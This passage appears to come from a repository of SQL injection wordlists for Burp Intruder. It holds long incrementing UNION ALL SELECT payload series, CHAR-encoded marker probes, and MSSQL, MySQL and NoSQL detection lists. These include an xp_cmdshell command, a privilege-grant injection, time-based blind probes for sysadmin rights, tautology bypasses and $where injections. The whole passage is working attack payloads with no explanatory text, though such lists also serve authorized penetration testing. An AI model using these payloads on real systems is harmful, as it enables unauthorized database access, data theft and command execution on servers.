261 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
262 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
263 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
264 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
265 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
266 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
267 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
268 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
269 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
270 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
271 | UNION ALL SELECT NULL--
272 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
273 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
274 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
275 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
276 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
277 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
278 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
279 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
280 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
281 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
282 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
283 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
284 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
285 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
286 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
287 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
288 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
289 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
290 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
291 | UNION ALL SELECT NULL#
292 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
293 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
294 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
295 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
296 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
297 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
298 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
299 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
300 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
301 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
302 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
303 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
304 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
305 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
306 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
307 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
308 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
309 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
310 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
311 | UNION ALL SELECT NULL
312 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
313 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
314 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
315 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
316 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
317 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
318 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
319 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
320 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
321 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
322 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
323 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
324 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
325 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
326 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
327 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
328 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
329 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
330 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
331 | AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
332 | AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
333 | AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
334 | UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
335 | UNION ALL SELECT 'INJ'||'ECT'||'XXX'
336 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
337 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
338 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
339 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
340 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
341 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
342 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
343 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
344 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
345 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
346 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
347 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
348 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
349 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
350 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
351 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
352 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
353 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
354 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
355 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
356 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
357 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
358 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
359 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
360 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
361 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
362 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
363 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
364 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
365 | UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
366 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
367 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
368 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
369 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
370 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
371 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
372 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
373 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
374 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
375 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
376 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
377 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
378 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
379 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
380 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
381 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
382 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
383 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
384 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
385 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
386 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
387 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
388 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
389 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
390 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
391 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
392 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
393 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
394 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
395 | UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
396 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
397 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
398 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
399 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
400 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
401 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
402 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
403 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
404 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
405 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
406 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
407 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
408 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
409 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
410 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
411 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
412 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
413 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
414 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
415 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
416 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
417 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
418 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
419 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
420 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
421 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
422 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
423 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
424 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
425 |
--------------------------------------------------------------------------------
/Intruder/detect/MSSQL/MSSQL.txt:
--------------------------------------------------------------------------------
1 | ; --
2 | '; --
3 | '); --
4 | '; exec master..xp_cmdshell 'ping 10.10.1.2'--
5 | ' grant connect to name; grant resource to name; --
6 | ' or 1=1 --
7 | ' union (select @@version) --
8 | ' union (select NULL, (select @@version)) --
9 | ' union (select NULL, NULL, (select @@version)) --
10 | ' union (select NULL, NULL, NULL, (select @@version)) --
11 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) --
12 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
13 |
--------------------------------------------------------------------------------
/Intruder/detect/MSSQL/MSSQL_blind.txt:
--------------------------------------------------------------------------------
1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
9 |
--------------------------------------------------------------------------------
/Intruder/detect/MySQL/MySQL.txt:
--------------------------------------------------------------------------------
1 | 1'1
2 | 1 exec sp_ (or exec xp_)
3 | 1 and 1=1
4 | 1' and 1=(select count(*) from tablenames); --
5 | 1 or 1=1
6 | 1' or '1'='1
7 | 1or1=1
8 | 1'or'1'='1
9 | fake@ema'or'il.nl'='il.nl
10 |
--------------------------------------------------------------------------------
/Intruder/detect/MySQL/MySQL_MSSQL.txt:
--------------------------------------------------------------------------------
1 | 1
2 | 1 and user_name() = 'dbo'
3 | \'; desc users; --
4 | 1\'1
5 | 1' and non_existant_table = '1
6 | ' or username is not NULL or username = '
7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
9 | 1 uni/**/on select all from where
10 |
11 |
--------------------------------------------------------------------------------
/Intruder/detect/NoSQL/no-sql.txt:
--------------------------------------------------------------------------------
1 | true, $where: '1 == 1'
2 | , $where: '1 == 1'
3 | $where: '1 == 1'
